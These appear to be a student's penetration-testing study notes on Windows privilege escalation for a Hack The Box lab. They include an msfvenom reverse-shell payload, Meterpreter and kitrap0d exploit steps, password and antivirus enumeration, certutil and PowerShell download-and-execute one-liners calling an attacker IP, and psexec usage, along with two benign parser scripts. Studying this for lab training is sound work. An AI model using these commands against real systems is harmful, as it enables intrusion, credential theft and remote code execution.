1. Enumeration & Kernel Exploits

All the resources you need: https://github.com/TCM-Course-Resources/Windows-Privilege-Escalation-Resources/blob/master/README.md

Enumeration and first foothold

https://fuzzysecurity.com/ « so amazing !! »

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html

  • Through an anonymous FTP connection we may be able to both download and UPLOAD content !!

HTB Machines

  • https://app.hackthebox.com/machines/Devel

  • IIS7 <--- the web server !!
  • Microsoft ASP.NET <--- the framework !!
  • Windows Server <--- the operating system !!

    What kind of payload to upload and execute ??

      * reverseShell.asp or .aspx, generated using `msfvenom`

Q) What is a Meterpreter session ??

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.x.x LPORT=1234 -f aspx > shell.aspx
# shell_reverse_tcp gives a plain command shell; the meterpreter> session used below comes from the windows/meterpreter/reverse_tcp payload instead

meterpreter> getuid

meterpreter> sysinfo

meterpreter> pwd

meterpreter> cd c:\\windows\\temp

meterpreter> upload /home/user/Tool.exe

# drop into a native command shell
meterpreter> shell
C:\windows\temp>

C:\windows\temp> powershell -ep bypass

# or load the Meterpreter PowerShell extension instead
meterpreter> load powershell


meterpreter> run post/multi/recon/local_exploit_suggester     # ---> e.g. exploit/windows/local/ms10_015_kitrap0d


meterpreter> background		# like CTRL+Z; prints the session number
msf6 > use exploit/windows/local/ms10_015_kitrap0d
msf6 exploit(windows/local/ms10_015_kitrap0d) > options

msf6 exploit(windows/local/ms10_015_kitrap0d) > set session [the number printed by "background"]
....
msf6 exploit(windows/local/ms10_015_kitrap0d) > run



meterpreter>

Enumeration

5 steps of hacking !! (MITRE ATT&CK)

information gathering, scanning and enumeration, exploitation

But even after we have exploited the machine, we go back to the enumeration step !!

Sys Enum

meterpreter> shell


C:\windows\temp> systeminfo 

# findstr = grep in CMD

C:\windows\temp> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"


C:\windows\temp> hostname 

Extract the patch level !!

wmic := windows management instrumentation commandline

qfe := quick fix engineering

kbid := knowledge base id

C:\windows\temp> wmic qfe
# each HotFixID maps to https://support.microsoft.com/?kbid=<number>


C:\windows\temp> wmic qfe get Caption,Description,HotFixID,InstalledOn


C:\windows\temp> wmic logicaldisk

C:\windows\temp> wmic logicaldisk get Caption,Description,ProviderName

# "list drives" is not a CMD command <=== wrong !! use wmic logicaldisk above
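The patch-level step above (and the Windows Exploit Suggester workflow later in these notes, which starts from a saved copy of `systeminfo`) comes down to pulling the OS identity and the installed KB ids out of `systeminfo` text. The following parser is an added example for these notes, not code from the course or from any tool it lists; it reads a constructed `systeminfo` sample and compares the installed hotfixes against a constructed placeholder baseline (`REQUIRED_KBS`), the way a patch-compliance check would.

```python
"""Parse the text of `systeminfo` (as pasted from a Windows host into a file)
and compare the installed hotfixes against a patch baseline.

Added example for these notes, not code from the course or from any tool it
lists. SAMPLE_SYSTEMINFO is constructed sample output and REQUIRED_KBS is a
constructed placeholder baseline; the KB numbers are illustrative only.
"""
import re

# Constructed sample of `systeminfo` output (only the sections this parser uses).
SAMPLE_SYSTEMINFO = """\
Host Name:                 DEVHOST
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB4512578
                           [02]: KB4516077
                           [03]: KB4523205
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
"""

# Constructed placeholder baseline: the KBs your patch policy expects to be present.
REQUIRED_KBS = {"KB4512578", "KB4516077", "KB4523205", "KB4541331"}

HEADER_FIELDS = ("Host Name", "OS Name", "OS Version", "System Type")
# Header lines look like "OS Name:   Microsoft Windows ..." (key, colon, padding, value).
HEADER_RE = re.compile(r"^([A-Za-z() ]+?):\s+(.*)$")
# Hotfix entries look like "[01]: KB4512578"; requiring the KB prefix keeps NIC entries out.
HOTFIX_RE = re.compile(r"\[\d+\]:\s+(KB\d+)")


def parse_systeminfo(text):
    """Return the selected header fields plus the list of installed KB ids."""
    info = {}
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m and m.group(1) in HEADER_FIELDS:
            info[m.group(1)] = m.group(2).strip()
    info["hotfixes"] = HOTFIX_RE.findall(text)
    return info


def missing_patches(info, required=REQUIRED_KBS):
    """KBs in the baseline that are not installed, sorted for stable output."""
    return sorted(required - set(info["hotfixes"]))


def build_report(text, required=REQUIRED_KBS):
    """Summarise OS identity, installed patches and baseline gaps for one host."""
    info = parse_systeminfo(text)
    return {
        "host": info.get("Host Name", "?"),
        "os": "{} ({}, {})".format(info.get("OS Name", "?"),
                                   info.get("OS Version", "?"),
                                   info.get("System Type", "?")),
        "installed": info["hotfixes"],
        "missing": missing_patches(info, required),
    }


if __name__ == "__main__":
    report = build_report(SAMPLE_SYSTEMINFO)
    print("Host:", report["host"])
    print("OS:", report["os"])
    print("Installed hotfixes:", ", ".join(report["installed"]))
    print("Missing vs baseline:", ", ".join(report["missing"]) or "none")
```

Run it against a real `systeminfo` dump by reading the file into `build_report`; the baseline set is the part you replace with the KBs your own patch policy requires.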

User/groups Enum


C:\windows\temp> whoami

C:\windows\temp> whoami /priv

C:\windows\temp> whoami /groups

C:\windows\temp> net user					<==== show the users on the machine !!

C:\windows\temp> net user specificUserName		<==== details of one user, including its local group memberships

C:\windows\temp> net localgroup administrators	<==== list the members of a group (net localgroup takes a group name, not a user name)

Net Enum

Why ?? You could find that the machine has 2 NICs (a second, internal network) !!

C:\windows\temp> ipconfig /all

C:\windows\temp> arp -a

C:\windows\temp> route print 

# to check whether there are services only reachable from inside the machine (or its internal network) ---> port forwarding

C:\windows\temp> netstat -ano 
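The `netstat -ano` remark above is really a question of scope: which listening services are bound to every interface, which to one NIC, and which only to loopback (the ones that are invisible from the network and that the port-forwarding note refers to). The parser below is an added example for these notes, not code from the course or from any tool it lists; it reads a constructed `netstat -ano` sample (addresses, ports and PIDs are illustrative only) and sorts the listening TCP sockets by bind scope, which is the same inventory a defender wants when checking what a host exposes.

```python
"""Parse `netstat -ano` output and sort listening TCP services by the interface
scope they are bound to.

Added example for these notes, not code from the course or from any tool it
lists. SAMPLE_NETSTAT is constructed sample output; the addresses, ports and
PIDs are illustrative only.
"""

# Constructed sample of `netstat -ano` output.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       812
  TCP    10.10.10.5:445         0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       2412
  TCP    10.10.10.5:49672       10.10.14.3:1234        ESTABLISHED     3188
  TCP    [::]:135               [::]:0                 LISTENING       812
  TCP    [::1]:8080             [::]:0                 LISTENING       2760
  UDP    0.0.0.0:500            *:*                                    1096
"""

LOOPBACK = {"127.0.0.1", "::1"}
WILDCARD = {"0.0.0.0", "::"}


def split_endpoint(endpoint):
    """'10.10.10.5:445' -> ('10.10.10.5', 445); '[::1]:8080' -> ('::1', 8080)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), int(port)


def scope_of(ip):
    """How far a socket bound to this address is reachable."""
    if ip in LOOPBACK:
        return "loopback-only"      # only from the host itself
    if ip in WILDCARD:
        return "all-interfaces"     # every NIC, including a second internal one
    return "single-interface"       # just the NIC that owns this address


def parse_netstat(text):
    """Return one dict per socket line; UDP lines have no State column."""
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue        # banner, blank and column-header lines
        proto = parts[0]
        local_ip, local_port = split_endpoint(parts[1])
        if proto == "TCP":
            state, pid = parts[3], int(parts[4])
        else:
            state, pid = "", int(parts[3])
        entries.append({"proto": proto, "local_ip": local_ip,
                        "local_port": local_port, "state": state, "pid": pid})
    return entries


def listening_services(entries):
    """Listening TCP sockets, each tagged with the scope of its bind address."""
    return [dict(e, scope=scope_of(e["local_ip"]))
            for e in entries if e["proto"] == "TCP" and e["state"] == "LISTENING"]


def loopback_only_ports(entries):
    """Ports bound to loopback and to nothing else: services that cannot be
    reached from the network, which is what the port-forwarding note is about."""
    listening = listening_services(entries)
    exposed = {e["local_port"] for e in listening if e["scope"] != "loopback-only"}
    local = {e["local_port"] for e in listening if e["scope"] == "loopback-only"}
    return sorted(local - exposed)


if __name__ == "__main__":
    sockets = parse_netstat(SAMPLE_NETSTAT)
    for s in listening_services(sockets):
        print("{:<16} port {:<6} pid {:<6} {}".format(
            s["local_ip"], s["local_port"], s["pid"], s["scope"]))
    print("loopback-only ports:", loopback_only_ports(sockets))
```

A port counts as loopback-only only if no other socket exposes the same port on a wider scope; in the sample, 135 is listed twice (IPv4 and IPv6 wildcard) and is therefore exposed, while 3306 and 8080 are host-local.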


Password Hunting

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#eop---looting-for-passwords

C:\Windows\system32> findstr /si password *.txt *.ini *.config


AV Enum


# sc = Service Control

C:\windows\temp> sc query windefend					# Windows Defender

.....

C:\windows\temp> sc queryex type= service			# all services, look for third-party AV (note the space after "type=")

.....

C:\windows\temp> netsh advfirewall firewall dump	# Windows Firewall !!

C:\windows\temp> netsh firewall show state 		# legacy "netsh firewall" context, deprecated but still present on older systems

C:\windows\temp> netsh firewall show config



Commands

# wget equivalent on Windows

> certutil -urlcache -f http://10.10.x.x:8000/file.exe outname.exe


Automated Tools

Note: not all tools may work; check their dependencies on the system before running.

  • WinPEAS.exe
      $ 
      $ 
    
  • Windows PrivEsc Checklist
      $ 
      $ 
    
  • Sherlock.ps1
      $ 
      $ 
    
  • Watson.exe
      $ 
      $ 
    
  • PowerUP.ps1

    Attacker side:

      $ wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Privesc/PowerUp.ps1 
    	
      $ echo Invoke-AllChecks >> PowerUp.ps1
    
      $ python3 -m http.server 80
    

    Victim Side

      C:\> powershell -c "iex (iwr http://IP_tun0:80/PowerUp.ps1)"
    
  • Psexec.exe

    Remote shell / telnet replacement that lets you execute processes on remote Windows systems, copy files to remote systems, process their output and stream it back. It allows execution of remote shell commands directly with a full interactive console without having to install any client software.

    Attacker Side

      $ wget https://raw.githubusercontent.com/fortra/impacket/master/examples/psexec.py
    
      $ python3 psexec.py USERNAME:'PASSWORD'@IP
    
  • JAWS-enum.ps1
      $ 
      $ 
    
  • Windows Exploit Suggester.py
      # copy the output of systeminfo from the victim machine into a file  
      $ 
      $ 
    
  • Metasploit Local Exploit Suggester
      $ 
      $ 
    
  • Seatbelt.exe
      $ 
      $ 
    
  • SharpUp.exe
      $ 
      $ 
    

Kernel Exploits

https://github.com/SecWiki/windows-kernel-exploits